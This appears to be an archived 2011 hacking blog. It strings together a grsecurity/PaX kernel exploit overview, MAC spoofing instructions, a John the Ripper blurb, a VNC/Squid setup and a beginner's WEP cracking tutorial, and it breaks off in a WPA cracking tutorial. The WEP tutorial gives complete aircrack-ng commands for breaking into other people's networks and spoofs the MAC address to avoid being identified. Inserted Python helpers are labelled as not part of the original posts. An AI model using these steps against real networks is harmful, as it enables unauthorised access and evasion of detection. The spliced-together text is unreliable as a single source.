
Thursday, April 21, 2011

Your Way to grsec/PaX Bypass-stackjacking

A technique to exploit grsecurity/PaX-hardened Linux kernels. Read on for a brief overview of our presentation and a link to the full slides and PoC code.
By Dan Rosenberg and Jon Oberheide

The Stackjacking Technique

In our slides, we presented a technique to exploit a grsecurity/PaX-hardened Linux kernel (e.g. GRKERNSEC_HIGH) given the existence of two exploitation primitives:
  • an arbitrary kernel write; and
  • a kernel stack memory disclosure.
To be clear, this attack vector is completely unnecessary when exploiting a vanilla Linux kernel, since an arbitrary write is more than sufficient to get root, given the vast amount of useful targeting information Linux gives out via /proc, etc. Likewise, the kernel stack memory disclosure is also unnecessary on vanilla, since there are much easier ways of getting this information. However, due to GRKERNSEC_HIDESYM (which aims to remove all known sources of info leakage), PAX_KERNEXEC (which makes global data structures with known locations read-only), and other mitigation features of grsecurity/PaX, effective exploitation is orders of magnitude harder than a vanilla kernel and took a few interesting twists.
Our technique can be broken down into three distinct stages:
  • Stack self-discovery: We observed that kernel stack memory disclosures can leak sensitive addresses to userspace.  In particular, if we can leak a pointer TO the kernel stack that resides ON the kernel stack, we can calculate the base of our own process’ kernel stack: kstack_base = leaked_addr & ~(THREAD_SIZE-1).  We call this technique stack self-discovery.
  • Stack groping: If our end goal is to read the address of our process’ cred structure and use our write to modify it and escalate privileges, we need to turn our kleak+kwrite into an arbitrary read.  We discovered two such techniques to do this: (1) the Rosengrope technique that modifies addr_limit in thread_info metadata stored at the base of the kstack to allow arbitrary reads from kernel space to userspace; and (2) the Obergrope technique that manipulates saved registers within a kernel stack frame that are later popped and used as the source address for copy_to_user()/put_user() operations.
  • Stack jacking: After constructing our arbitrary read from a kleak+kwrite, we read the task_struct address out of thread_info at the base of the kstack and then read the cred struct address out of task_struct. Armed with the address of our process’ credential structure and an arbitrary write, we modified our uids/gids/caps to escalate privileges.
For the full details, please see the presentation materials and PoC code:


The Response

If you haven’t yet read spender’s response to our presentation, I recommend doing so.  While I’ll refrain from commenting on the political aspects of his post, I’ll happily comment on the technical aspects.  The fixes that spender and pipacs have released have mitigated the particular exploit vectors we used to perform the stack groping stage of our attack against the grsec/PaX kernel:
  • The thread_info struct has been moved out from the base of the kernel stack preventing the Rosengrope technique from being able to write KERNEL_DS into the addr_limit member.
  • The RANDKSTACK feature, now available on both i386 and amd64, frustrates the Obergrope technique as the randomization of the kernel stack pointer on each system call makes writing into a particular offset in the stack frame unreliable.
Props to spender and pipacs for cranking out those fixes as well as a number of other enhancements.  While the latest grsecurity patch effectively prevents the current vectors we discovered and presented in our talks at HES and Infiltrate, there are several loose ends I need to investigate to ensure the fixes address other potential exploitation vectors.
More on that later…

Spoof MAC Address in Any OS


A MAC address (Media Access Control address) is a quasi-unique identifier, a six-byte number attached to most network adapter cards or network interface cards (NICs). As such, all network cards, whether Ethernet NIC, Gigabit Ethernet NIC, wireless 802.11a/b/g/n WiFi or HiperLAN adapter, should have different MAC addresses, which are also known as Ethernet Hardware Addresses (EHA) or adapter addresses.

In operating systems, a MAC address is usually represented as a 12-digit hexadecimal number, for example 1A-2B-3C-4D-5E-6F. In practice, layer 3 protocol addresses such as Internet Protocol (IP) addresses are resolved to layer 2 MAC addresses by ARP (Address Resolution Protocol), which lets each host be uniquely identified and frames be addressed to specific hosts on broadcast networks such as Ethernet. After resolution (or when a host on the LAN sends its MAC address to another machine that is not configured to reject unsolicited ARP replies, for preemptive caching), the MAC address is cached in the source PC's ARP table for later use. The contents of the ARP table on each computer can be viewed by typing arp -a in Windows or arp in Linux. MAC addresses thus form the basis of most layer 2 networking, upon which higher OSI layer protocols are built to produce complex, functioning networks.
There are many reasons a user may want to change the MAC address of a network adapter, which is also known as MAC spoofing. For example, to bypass MAC address filtering on a firewall or router: the trick can be used to get past a network access restriction by emulating a new, unrestricted MAC address, or to gain access by spoofing an authorized MAC address after sniffing a legitimate MAC address out of the air on a MAC-filtering Wi-Fi network.
Besides that, hackers or enthusiasts also spoof another host's MAC address as their own in order to receive traffic not meant for them, although the ARP poisoning technique is more commonly used for this. Changing the MAC address can also keep the real address from being detected and logged by services such as IDS, firewalls, DHCP servers, wireless access points and so on, and is essential to protecting the user's privacy. MAC spoofing can also trigger a Denial of Service (DoS) condition by causing routing problems when a duplicate MAC address exists on the network, especially one matching the gateway or the AP router's BSSID (Basic Service Set Identifier).
Whatever the reason, it's pretty easy to change the MAC address, or perform MAC spoofing, on most of today's hardware, as listed below. Strictly speaking, the original MAC address is burned into the network card and cannot be changed; however, the operating system can present a different MAC address for the network interface card using the tricks below.
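The address formats and the duplicate-MAC problem described above, as an added example that is not part of the original article: a small Python helper that normalizes the three spellings this page uses (Windows dashed, registry bare hex, *nix colon), decodes the I/G and U/L flag bits of the first octet, and audits an arp -a listing for MACs bound to several IPs and for locally administered (software-set) addresses. The sample arp -a output and every address in it are constructed.

```python
import re
from collections import defaultdict

# The three spellings this page uses for one address: Windows "1A-2B-3C-4D-5E-6F",
# the registry's bare "1A2B3C4D5E6F", and the *nix "1a:2b:3c:4d:5e:6f".
_MAC_RE = re.compile(r"^(?:[0-9A-Fa-f]{2}[:-]){5}[0-9A-Fa-f]{2}$|^[0-9A-Fa-f]{12}$")


def normalize_mac(text):
    """Return the address as six lowercase colon-separated octets, or None if
    the string is not a well-formed 48-bit MAC (wrong length or non-hex)."""
    text = text.strip()
    if not _MAC_RE.match(text):
        return None
    digits = re.sub(r"[:-]", "", text).lower()
    return ":".join(digits[i:i + 2] for i in range(0, 12, 2))


def classify_mac(mac):
    """Decode the two flag bits of the first octet (IEEE 802 addressing):
    bit 0 (I/G) set means a group/multicast address, clear means one station;
    bit 1 (U/L) set means locally administered, i.e. assigned by software
    rather than burned in by the vendor. Vendor addresses are universal, so a
    locally administered unicast MAC on the LAN deserves a second look."""
    first_octet = int(mac.split(":")[0], 16)
    return {
        "multicast": bool(first_octet & 0x01),
        "locally_administered": bool(first_octet & 0x02),
    }


# Constructed sample in the layout of Windows "arp -a" output; not captured
# from a real host.
SAMPLE_ARP_A = """\
Interface: 192.168.1.10 --- 0xb
  Internet Address      Physical Address      Type
  192.168.1.1           00-11-22-aa-bb-01     dynamic
  192.168.1.20          1a-2b-3c-4d-5e-6f     dynamic
  192.168.1.21          00-11-22-aa-bb-01     dynamic
  192.168.1.255         ff-ff-ff-ff-ff-ff     static
"""

_ARP_LINE = re.compile(r"^\s*(\d{1,3}(?:\.\d{1,3}){3})\s+(\S+)\s+\w+")


def audit_arp_table(arp_output):
    """Parse arp -a output and report (a) MACs bound to more than one IP, the
    duplicate-address condition the text warns can disrupt a LAN, and
    (b) unicast entries whose MAC carries the locally administered bit."""
    ips_by_mac = defaultdict(list)
    for line in arp_output.splitlines():
        match = _ARP_LINE.match(line)
        if not match:
            continue                      # header / interface lines
        mac = normalize_mac(match.group(2))
        if mac is None:
            continue                      # malformed entry, skip it
        ips_by_mac[mac].append(match.group(1))
    duplicates = {mac: ips for mac, ips in ips_by_mac.items() if len(ips) > 1}
    local_unicast = sorted(
        mac for mac in ips_by_mac
        if classify_mac(mac)["locally_administered"]
        and not classify_mac(mac)["multicast"]
    )
    return {"duplicates": duplicates, "locally_administered": local_unicast}


if __name__ == "__main__":
    print(normalize_mac("1A-2B-3C-4D-5E-6F"), classify_mac("02:01:02:03:04:08"))
    print(audit_arp_table(SAMPLE_ARP_A))
```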
Change the MAC address in Windows
  1. Go to Start -> Control Panel. Double-click Network Connections (inside the Network and Internet Connections category in Windows XP). Then right-click the active network connection whose network adapter's MAC address you want to change (normally Local Area Network or Wireless Network Connection) and click Properties. The above steps work in Windows XP, Windows 2000 and Windows Server 2003. In Windows Vista, the NIC's properties are reached from Control Panel -> Network and Internet -> Network and Sharing Center -> Manage Network Connections.
    Alternatively, if you already know which network adapter is responsible for your network or Internet connection, go to Device Manager and open the properties dialog by double-clicking the NIC itself.
  2. In the General tab, click the Configure button.
  3. Click the Advanced tab.
  4. In the Property section, select and highlight Network Address or Locally Administered Address.
  5. To the right, the “Not Present” radio button is selected by default. Change the value by clicking the radio button for Value:, then type in the new MAC address to assign to the NIC.
    The MAC address consists of 6 pairs of digits (0 – 9) and letters (A – F). For example, 88-17-E8-90-E2-0A. When entering the new MAC value, omit the dashes (-), for example 8817E890E20A.
  6. Click OK when done.
  7. To verify the change of MAC address, go to a command prompt and type one of the following commands:
    ipconfig /all
    net config rdr
  8. Reboot the computer to make the change effective.
Note: To restore the original default MAC address, simply set the option back to “Not Present”.
Change the MAC Address of NIC in Windows via Registry
  1. Open a command prompt.
  2. Type the following command and hit Enter:
    ipconfig /all
  3. Record the Description and the Physical Address (the MAC address) of the active network connection (discard those in the Media Disconnected state).
    For example, in the figure above, the Description is Intel(R) Wireless WiFi Link 4965AGN and the MAC address is in the format 00-XX-XX-XX-XX-XX.
  4. Also in the command prompt, type the following command and hit Enter:
    net config rdr
  5. Record the GUID for the MAC address of the active connection's NIC whose MAC address is to be changed. The GUID is contained within the { and } brackets right in front of the MAC address, as shown in the figure below.
  6. Type regedt32 or regedit in the Start -> Run box, or in Start Search for Windows Vista. Note: for Windows NT 4.0 and Windows 2000, regedt32 must be used.
  7. Navigate to the following registry key: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002BE10318}
  8. Expand the {4D36E972-E325-11CE-BFC1-08002BE10318} tree; there will be sub-keys in the form 0000, 0001, 0002 and so on.
  9. Go through each sub-key starting from 0000 and look for the one whose DriverDesc value data matches the NIC description recorded in the step above. In most cases it will be similar to the network adapter card's name. To verify that the sub-key found is indeed the correct one, check the value of NetCfgInstanceId, which should match the NIC's GUID taken from the step above.
  10. Once a sub-key is matched to the network interface card whose MAC address is to be spoofed, select and highlight the sub-key. Right-click the sub-key (for example, 0000), then select New -> String Value. Name the new value NetworkAddress. Note: If a NetworkAddress REG_SZ value already exists in the right pane, skip this step.
  11. Then double-click NetworkAddress and enter the new MAC address as its value data.
    Note that the 12-digit MAC address is in hexadecimal format and should be entered without any dashes (-). For example, 1A2B3C4D5E6F.
  12. Reboot the system to make the new MAC address effective. Alternatively, if you don't want to restart the system, try disabling and then re-enabling the network adapter in Device Manager.
  13. To verify the change of MAC address, go to a command prompt and type one of the following commands:
    ipconfig /all
    net config rdr
Note: To restore the true original hardware burned-in MAC address, remove the NetworkAddress registry value that was added.
Alternative: Third-party tools and utilities to change the MAC address in Windows are plentiful, for example: SMAC (direct download link to smac20_setup.ex; supports Windows Vista, XP, 2003, 2000), Macshift (direct download link to macshift.zip; for Windows XP), BMAC (an almost identical SMAC MAC changer clone by moorer-software.com), Mac MakeUp (direct download link to macmakeup.zip; for Windows 2000/XP/2003/Vista), MadMACs (MAC Address Spoofing And Host Name Randomizing App For Windows; direct download MadMACs.zip), EtherChange (direct download link to etherchange.exe), and Technitium MAC Address Changer (for Windows 2000 / XP / Server 2003 / Vista / Server 2008).
How to Change MAC Address (MAC Spoofing) in Linux and *nix
To change your MAC address in Linux and most Unix-like (*nix) systems, run the following commands:
ifconfig <interface> down
ifconfig <interface> hw ether <MAC address>
ifconfig <interface> up
For example, the command looks like “ifconfig eth0 down hw ether 1A:2B:3C:4D:5E:6F”. The first command brings down the network interface, the second changes its MAC address and the third brings the interface up again. Note that in some cases the following commands have to be used to bring the network interface down and up:
/etc/init.d/networking stop or /etc/init.d/network stop (in the case of Fedora Core 5)
/etc/init.d/networking start or /etc/init.d/network start (in the case of Fedora Core 5)
Alternatively, on Fedora Core 5 Linux with the Iproute2 tools installed, the following commands can also change the MAC address to a spoofed version:
/etc/init.d/network stop
ip link set <interface> address 1A:2B:3C:4D:5E:6F
/etc/init.d/network start
For example, “ip link set eth0 address 1A:2B:3C:4D:5E:6F”. To check whether the MAC address has been spoofed, use ip link ls eth0 or ip addr ls eth0 instead of ifconfig eth0.
How to Make the Spoofed MAC Address Permanent Even After Reboot in Linux
Edit the ifcfg-eth0 file (or the similar file for a different interface) and add the following variable line to the file:
MACADDR=12:34:56:78:90:ab
Then run service network restart to make the change effective immediately.
How to Make the Spoofed MAC Address Permanent on Restart in Debian
Edit the /etc/network/interfaces file and add the following line to the appropriate interface section so that the MAC address is set when the network device is started:
hwaddress ether <MAC address>
For example, “hwaddress ether 02:01:02:03:04:08”.
Alternative: GNU MAC Changer (for Debian, Slackware, ArchLinux, Mandrake, Crux, and RPM-based distributions such as Fedora, Red Hat, CentOS, ASPLinux, SUSE Linux, openSUSE, etc.).
How to Change MAC Address (MAC Spoofing) in BSD or FreeBSD
Issue the following commands in a shell:
ifconfig <interface> down
ifconfig <interface> link <MAC address> (or ifconfig <interface> ether <MAC address>)
ifconfig <interface> up
The first command brings down the network interface (optional), the second changes its MAC address and the third brings the interface up again (optional). For example, the command looks like “ifconfig xl0 link 1A:2B:3C:4D:5E:6F” or “ifconfig fxp0 ether 1A:2B:3C:4D:5E:6F”.
How to Change MAC Address in Solaris
The shell command to change the MAC address in Sun Solaris is as follows:
ifconfig <interface> ether <MAC address>
For example, the command looks like “ifconfig hme0 ether 1A:2B:3C:4D:5E:6F”. Note that the change is temporary and does not persist after a reboot. To make the change permanent, the command can be placed in a runtime control script (/sbin/sh).
How to Spoof MAC Address in HP-UX
It's possible to change the MAC address using HP-UX SAM. Select Networking and Communications, then select the interface, then click Action -> Modify -> Advanced Options. Finally, change the value of the station address, which is the name HP-UX uses for the MAC address.
How to Spoof and Change MAC Address in OpenBSD
Use the following command to change the MAC address to a spoofed MAC in OpenBSD (after version 3.8):
ifconfig <interface> lladdr <MAC address>
For example, “ifconfig bge3 lladdr 1A:2B:3C:4D:5E:6F”.
How to Change to Spoofed MAC Address Permanently in OpenBSD
To have the MAC address changed at boot, before the network connection is established and even before the hostname.* files are parsed, edit the /etc/netstart file and add the following lines before the line “# Now parse the hostname.* file”:
if [ "$if" = "<interface>" ]; then
    ifconfig $if lladdr <MAC address>
fi

# Now parse the hostname.* file
....

How to Change MAC Address in Mac OS X
From Mac OS X 10.4.x (Darwin 8.x) onwards, the MAC address of a wired Ethernet interface can be altered in Apple Mac OS X in a fashion similar to the Linux and FreeBSD methods. To do so, type the following command in Terminal.app:
sudo ifconfig en0 ether aa:bb:cc:dd:ee:ff
or
sudo ifconfig en0 lladdr aa:bb:cc:dd:ee:ff (for Mac OS X 10.5 Leopard)
where en0 is the network interface (numbered en0, en1, en2 …) and aa:bb:cc:dd:ee:ff is the desired MAC address in hex notation.
Alternative: MacDaddy (download MacDaddyX.dmg; supports the AirPort wireless adapter).
Thanks To www.mydigitallife.info

Hacking Tool: John the Ripper: Crack Password

  • It is a command-line tool designed to crack both Unix and NT passwords. John is extremely fast and free.
  • The resulting passwords are case insensitive and may not represent the real mixed-case password.
John the Ripper is a fast password cracker, currently available for many flavors of UNIX (11 are officially supported), DOS, Win32, BeOS, and OpenVMS. Its primary purpose is to detect weak UNIX passwords. John the Ripper is a part of Owl, Debian GNU/Linux, SuSE, very recent versions of Mandrake Linux, and EnGarde Linux. It is in the ports/packages collections of FreeBSD, NetBSD, and OpenBSD.
John the Ripper is designed to be both powerful and fast. It combines several cracking modes in one program, and is fully configurable for specific needs. As John is available for different platforms, the attacker can use the same cracker everywhere and even continue a cracking session started on a different platform. It supports several cryptographic password hash types most commonly found on various UNIX flavors. Supported out of the box are Kerberos AFS and Windows NT/2000/XP LM hashes, plus several more with contributed patches.
Out of the box, John supports (and auto detects) the following ciphertext formats: standard and double-length DES-based, BSDI's extended DES-based, FreeBSD's MD5-based, and OpenBSD's Blowfish-based. With just one additional command (required to extract the passwords), John can crack AFS passwords and WinNT LM hashes. John has highly optimized modules for different ciphertext formats and architectures. Some of the algorithms used - such as bitslice DES - require a more powerful interface. Additionally, there are assembly routines for several processors and architectures (special Intel Pentium version, x86 with MMX, generic x86, Alpha EV4, SPARC V8).
However, the resulting passwords are case insensitive and may not represent the real mixed-case password. Indeed, this is only a small hindrance to a determined, patient attacker.

Configuring VNC-SERVER And Squid Proxy Server in CentOS

Configuring VNC Server and Squid Proxy Server in a CentOS (32- & 64-bit) based VPS
Installing the GUI-based GNOME desktop, squid, vnc, vnc-server and firefox in a CentOS-based VPS

NOTE:

# stands for a comment
$ denotes shell commands

1st. Open an SSH session to your VPS with your favorite SSH client.

2nd. At the shell prompt >_ write the commands as described below.

Code:
$ yum update -y

Phase of installing all products...
Code:
$ yum groupinstall gnome-desktop -y
# The next command will install 4 packages at once!
# 1 squid is an advanced proxy server
# 2 vnc is the VNC viewer client
# 3 vnc-server is the VNC server, used to operate the remote computer's GNOME GUI from your desk.
# 4 firefox will unleash the speed of the Internet, as it is installed on the VPS!
Code:
$ yum install squid vnc vnc-server firefox -y


# Configuring VNC-SERVER in CentOS based VPS....


# Set Your VNC Password For login..

Code:
$ vncpasswd
# Start vncserver to generate default config files...
Code:
$ vncserver


# Once the files are generated, we need to terminate the vnc process(es) in order to make custom GNOME configs..

Code:
$ pkill vncserver
$ pkill Xvnc
$ reboot



# Add the GNOME-based configuration to this FILE via the 'vi' editor..

# -To edit or insert text in the vi editor, press 'i'
# -To save the modified file, press 'Esc' > ':wq'
# -To quit without saving: 'Esc' > ':q!'
# -To break the vi process: 'Ctrl + C'
Code:
$ vi ~/.vnc/xstartup

# Add the code below into the file 'xstartup'
-- CUT - PASTE--
Code:
#!/bin/sh

( while true; do xterm; done ) &

# Uncomment the following two lines for normal desktop:
# (leave them commented here, or the exec replaces this script and the gnome-session line below is never reached)
# unset SESSION_MANAGER
# exec /etc/X11/xinit/xinitrc

[ -x /etc/vnc/xstartup ] && exec /etc/vnc/xstartup
[ -r $HOME/.Xresources ] && xrdb $HOME/.Xresources
xsetroot -solid grey
vncconfig -iconic &
xterm -geometry 1024x768 -ls -name "$VNCDESKTOP Desktop" &
gnome-session &
-- CUT PASTE--




# To auto-start the vnc server each time the system boots.

Code:
$ chkconfig vncserver on


# To start vnc-server right now.

Code:
$ service vncserver start

Now open vnc-viewer on your desktop and give the IP of the VPS followed by :1,
i.e. 42.23.1.4:1,
where :1 is display 1, port 5901, the default used by vnc-server in Linux.



# Configuring Squid Proxy Server in CentOS (32 & 64) based VPS....




# Switch to the squid directory

Code:
$ cd /etc/squid


# Move the default squid configuration aside as a backup file!

Code:
$ mv squid.conf squid.conf.backup


# Fetch the pre-made squid.conf file..

Code:
$ wget http://pastebin.com/download.php?i=Y8j35JS9 --output-document=/etc/squid/squid.conf

-- NOTE | Caution --
Change directives like those mentioned below to suit your needs!

# Change the default port 3128 to 8080 or 80, as per your need.
Code:
http_port 3128

# Check your IP > tracemyip.org
# You should add your own address range to get access to the proxy server, or else it will show unauthorised access...

Code:
acl range_airtel src 122.0.0.0/255.0.0.0

...

http_access allow range_airtel
i.e.

Code:
acl range_US src 209.0.0.0/255.0.0.0

...

http_access allow range_US
-- End of NOTE | Caution --

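The http_access rules above decide who may relay through the proxy, and a /8 range admits a whole ISP's customers, not just you. As an added example that is not part of this tutorial, the Python below models Squid's http_access evaluation (first matching rule wins; when nothing matches, the result is the opposite of the last rule, as Squid's documentation states) and compares the tutorial-style single-/8 allow with a fragment restricted to one block plus `http_access deny all`. The block 198.51.100.0/24 and all client addresses are constructed placeholders.

```python
import ipaddress

# Squid predefines "acl all src all"; model it as the whole IPv4 space so
# "http_access deny all" works without the fragment declaring it.
_BUILTIN_ACLS = {"all": [ipaddress.ip_network("0.0.0.0/0")]}


def _to_network(token):
    """Accept CIDR (122.0.0.0/8), Squid's addr/mask form (122.0.0.0/255.0.0.0),
    a bare host address, or the keyword 'all'."""
    if token == "all":
        return ipaddress.ip_network("0.0.0.0/0")
    return ipaddress.ip_network(token, strict=False)


def parse_squid_access(conf_text):
    """Pull 'acl NAME src NET ...' definitions and 'http_access allow|deny ACL ...'
    rules out of a squid.conf fragment. Only src ACLs are modelled here."""
    acls = {name: list(nets) for name, nets in _BUILTIN_ACLS.items()}
    rules = []
    for raw in conf_text.splitlines():
        line = raw.split("#", 1)[0].strip()          # strip comments
        if not line:
            continue
        parts = line.split()
        if parts[0] == "acl" and len(parts) >= 4 and parts[2] == "src":
            # The same acl name on several lines is a union in Squid.
            acls.setdefault(parts[1], []).extend(_to_network(p) for p in parts[3:])
        elif parts[0] == "http_access" and len(parts) >= 3 and parts[1] in ("allow", "deny"):
            rules.append((parts[1], parts[2:]))
    return acls, rules


def squid_decides(acls, rules, client_ip):
    """Squid's http_access evaluation for one client address: rules are tried
    in order, a rule matches when every ACL listed on it matches ('!' negates),
    the first matching rule wins, and when nothing matches the result is the
    OPPOSITE of the last rule's action (documented Squid behaviour), which is
    why a ruleset should end with 'http_access deny all'."""
    ip = ipaddress.ip_address(client_ip)

    def acl_hit(token):
        name = token.lstrip("!")
        hit = any(ip in net for net in acls.get(name, []))
        return hit != token.startswith("!")

    for action, tokens in rules:
        if all(acl_hit(t) for t in tokens):
            return action
    if not rules:
        return "deny"            # Squid 3.x denies when no http_access lines exist
    return "allow" if rules[-1][0] == "deny" else "deny"


def allowed_src_addresses(acls, rules):
    """Number of IPv4 addresses admitted by plain 'http_access allow NAME' rules,
    a rough measure of how open the proxy is to strangers."""
    total = 0
    for action, tokens in rules:
        if action == "allow" and len(tokens) == 1 and not tokens[0].startswith("!"):
            total += sum(net.num_addresses for net in acls.get(tokens[0], []))
    return total


# Constructed fragments. The first mirrors the tutorial's single /8 allow: every
# customer of that ISP can relay through the proxy. The second admits only the
# block you actually connect from (a documentation range here) and denies the rest.
OPEN_RANGE_CONF = """\
acl range_airtel src 122.0.0.0/255.0.0.0
http_access allow range_airtel
"""

RESTRICTED_CONF = """\
acl mynet src 198.51.100.0/24   # only the block you actually connect from
http_access allow mynet
http_access deny all
"""


def compare_configs():
    """Decide a few constructed client addresses under both fragments."""
    results = {}
    for label, conf in (("open", OPEN_RANGE_CONF), ("restricted", RESTRICTED_CONF)):
        acls, rules = parse_squid_access(conf)
        results[label] = {
            "allowed_addresses": allowed_src_addresses(acls, rules),
            "122.5.6.7": squid_decides(acls, rules, "122.5.6.7"),
            "198.51.100.7": squid_decides(acls, rules, "198.51.100.7"),
            "203.0.113.9": squid_decides(acls, rules, "203.0.113.9"),
        }
    return results


if __name__ == "__main__":
    for label, outcome in compare_configs().items():
        print(label, outcome)
```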


# Make SQUID a service so that it starts at system start (boot time)

Code:
$ chkconfig squid on


# Starting squid proxy server

Code:
$ service squid start


# Cross-verify the listening port via the command below

Code:
$ netstat -tulpn | grep 3128

Open your browser, set the proxy IP & port in your browser, and bingo!
i.e. IP: 42.23.1.4 Port: 3128
Thanks To aa-Numb

> For Educational Purpose Only !

Beginners Guide To Hacking Wireless Networks

Hacking WEP wifi passwords
Basic Entry into a WEP Encrypted Network

This tutorial explains EVERYTHING in detail, so it is quite long. Enjoy.

1. Getting the right tools
This tutorial was written on BT3, but download the latest release, BT4.

Download Backtrack 4. It can be found here:

http://www.backtrack-linux.org/downloads/

I downloaded the DVD ISO and burned it to a DVD. Insert your BT4 DVD/USB drive and reboot your computer into BT4. I always load the 3rd boot option from the boot menu (VESA/KDE). You only have a few seconds before it auto-boots into the 1st option, so be ready. The 1st option boots too slowly or not at all, so always boot from the 2nd or 3rd. Experiment to see what works best for you.

2. Preparing the slave network for attack

Once in BT4, click the tiny black box in the lower left corner to load up a "Konsole" window. Now we must prep your wireless card.
Type:

airmon-ng

You will see the name of your wireless card (mine is named "ath0"). From here on out, replace "ath0" with the name of your card.
Now type:

airmon-ng stop ath0

then type:

ifconfig wifi0 down

then:

macchanger --mac 00:11:22:33:44:55 wifi0

then:

airmon-ng start wifi0

What these steps did was spoof (fake) your MAC address so that, JUST IN CASE your computer is discovered by someone as you are breaking in, they will not see your REAL MAC address. Moving on...
Now it's time to discover some networks to break into.

Type:

airodump-ng ath0

Now you will see a list of wireless networks start to populate. Some will have a better signal than others, and it is a good idea to pick one that has a decent signal; otherwise it will take forever to crack, or you may not be able to crack it at all.
Once you see the network that you want to crack, do this:

hold down Ctrl and type C

This will stop airodump from populating networks and will freeze the screen so that you can see the info that you need.

**Now from here on out, when I tell you to type a command, you need to replace whatever is in parentheses with what I tell you to from your screen. For example: if I say to type:
-c (channel)
then don't actually type in
-c (channel)
Instead, replace that with whatever the channel number is...so, for example, you would type:
-c 6
Can't be much clearer than that...let's continue...

Now find the network that you want to crack and MAKE SURE that it says the encryption for that network is WEP. If it says WPA or any variation of WPA then move on...you can still crack WPA with backtrack and some other tools but it is a whole other ball game and you need to master WEP first.

[Image: airodump.jpg]

Once you've decided on a network, take note of its channel number and bssid. The bssid will look something like this --> 05:gk:30:fo:s9:2n
The Channel number will be under a heading that says "CH".
Now, in the same Konsole window, type:

airodump-ng -c (channel) -w (file name) --bssid (bssid) ath0

the FILE NAME can be whatever you want. This is simply the place that airodump is going to store the packets of info that you receive to later crack. You don't even put in an extension...just pick a random word that you will remember. I usually make mine "wepkey" because I can always remember it.

**Side Note: if you crack more than one network in the same session, you must have different file names for each one or it won't work. I usually just name them wepkey1, wepkey2, etc.

Once you typed in that last command, the screen of airodump will change and start to show your computer gathering packets. You will also see a heading marked "IV" with a number underneath it. This stands for "Initialization Vector" but in noob terms all this means is "packets of info that contain clues to the password." Once you gain a minimum of 5,000 of these IV's, you can try to crack the password. I've cracked some right at 5,000 and others have taken over 60,000. It just depends on how long and difficult they made the password.

Now you are thinking, "I'm screwed because my IV's are going up really slowly." Well, don't worry, now we are going to trick the router into giving us HUNDREDS of IV's per second.

3. Actually cracking the WEP password

Now leave this Konsole window up and running and open up a 2nd Konsole window. In this one type:

aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 ath0

http://i574.photobucket.com/albums/ss184...eplay1.jpg

This will send some commands to the router that basically cause it to associate with your computer even though you are not officially connected with the password. If this command is successful, you should see about 4 lines of text print out with the last one saying something similar to "Association Successful :-)" If this happens, then good! You are almost there. Now type:

aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 ath0

http://i574.photobucket.com/albums/ss184...eplay2.jpg

This will generate a bunch of text and then you will see a line where your computer is gathering a bunch of packets and waiting on ARP and ACK. Don't worry about what these mean...just know that these are your meal tickets. Now you just sit and wait. Once your computer finally gathers an ARP request, it will send it back to the router and begin to generate hundreds of ARP and ACK per second. Sometimes this starts to happen within seconds...sometimes you have to wait up to a few minutes. Just be patient. When it finally does happen, switch back to your first Konsole window and you should see the number underneath the IV starting to rise rapidly. This is great! It means you are almost finished! When this number reaches AT LEAST 5,000 then you can start your password crack. It will probably take more than this but I always start my password cracking at 5,000 just in case they have a really weak password.

Now you need to open up a 3rd and final Konsole window. This will be where we actually crack the password. Type:

aircrack-ng -b (bssid) (filename)-01.cap

Remember the filename you made up earlier? Mine was "wepkey". Don't put a space between it and -01.cap here. Type it as you see it. So for me, I would type wepkey-01.cap
Once you have done this you will see aircrack fire up and begin to crack the password. Typically you have to wait for more like 10,000 to 20,000 IVs before it will crack. If this is the case, aircrack will test what you've got so far and then it will say something like "not enough IVs. Retry at 10,000." DON'T DO ANYTHING! It will stay running...it is just letting you know that it is on pause until more IVs are gathered. Once you pass the 10,000 mark it will automatically fire up again and try to crack it. If this fails it will say "not enough IVs. Retry at 15,000." and so on until it finally gets it.

http://i574.photobucket.com/albums/ss184...crack1.jpg

If you do everything correctly up to this point, before too long you will have the password! Now if the password looks goofy, don't worry, it will still work. Some passwords are saved in ASCII format, in which case aircrack will show you exactly what characters they typed in for their password. Sometimes, though, the password is saved in HEX format, in which case the computer will show you the HEX encoding of the password. It doesn't matter either way, because you can type in either one and it will connect you to the network.

Take note, though, that the password will always be displayed in aircrack with a colon after every 2 characters. So for instance if the password was "secret", it would be displayed as:
se:cr:et
This would obviously be the ASCII format. If it was a HEX encrypted password that was something like "0FKW9427VF" then it would still display as:
0F:KW:94:27:VF
Just omit the colons from the password, boot back into whatever operating system you use, try to connect to the network and type in the password without the colons and presto! You are in!

It may seem like a lot to deal with if you have never done it, but after a few successful attempts, you will get very quick with it. If I am near a WEP encrypted router with a good signal, I can often crack the password in just a couple of minutes.

I am not responsible for what you do with this information. Any malicious/illegal activity that you do, falls completely on you because...technically...this is just for you to test the security of your own network. :-)

I will gladly answer any legitimate questions anyone has to the best of my ability.
HOWEVER, I WILL NOT ANSWER ANYONE THAT IS TOO LAZY TO READ THE WHOLE TUT AND JUST ASKS ME SOME QUESTION THAT I CLEARLY ANSWERED. No one wants to hold your hand through this...read the tut and go experiment until you get it right.

There are rare occasions where someone will use WEP encryption with SKA (Shared Key Authentication) as well. If this is the case, additional steps are needed to associate with the router and therefore the steps I laid out here will not work. I've only seen this once or twice, though, so you probably won't run into it. If I get motivated, I may throw up a tut on how to crack this in the future.
By Sarvesh

How To Hack WEP/WPA With Linux

Background

I noticed a strange behaviour: a lot of people were into cracking WEP, but still had a lot of questions on WPA. After these findings, I decided to just write my own tutorial :-)
Knowledge
If you look at the attacks closely, you'd think WPA was very easy to crack. Well, some people say it is, some don't agree. The fact is that if the password is in some sort of dictionary, the password can be cracked. You'll need a 4-way handshake from a client connecting to an AP. The 4-way handshake holds an encrypted exchange which can be cracked by dictionary attack. You'll need a huge list and some luck that the password is in the list, or you can make a personal list created with a password tool of your choice (like john), which will not be discussed in this tutorial ;-). For this tutorial, of course, I'll be using the Aircrack-ng suite.
Optional: laziness

sudo su
You might need root access to run these applications. For example, if you are using Ubuntu and you don't want to type "sudo" in front of every line, you could use this optional command.
Knowing what interface to use
First of all, you'll have to know the name of your wireless interface, that's why you type:
iwconfig
Identifying your victim

airmon-ng start interface
You'd get a small message saying: (monitor mode enabled on spoofedinterface) // In my case, the interface was "mon0"..
airodump-ng spoofedinterface
The next step would be choosing your victim. Obviously we would be looking for someone with WPA encryption now, since you want to crack someone with WPA. Write down his BSSID and his CHANNEL.
Rebooting the network card to fit the right channel

airmon-ng stop spoofedinterface
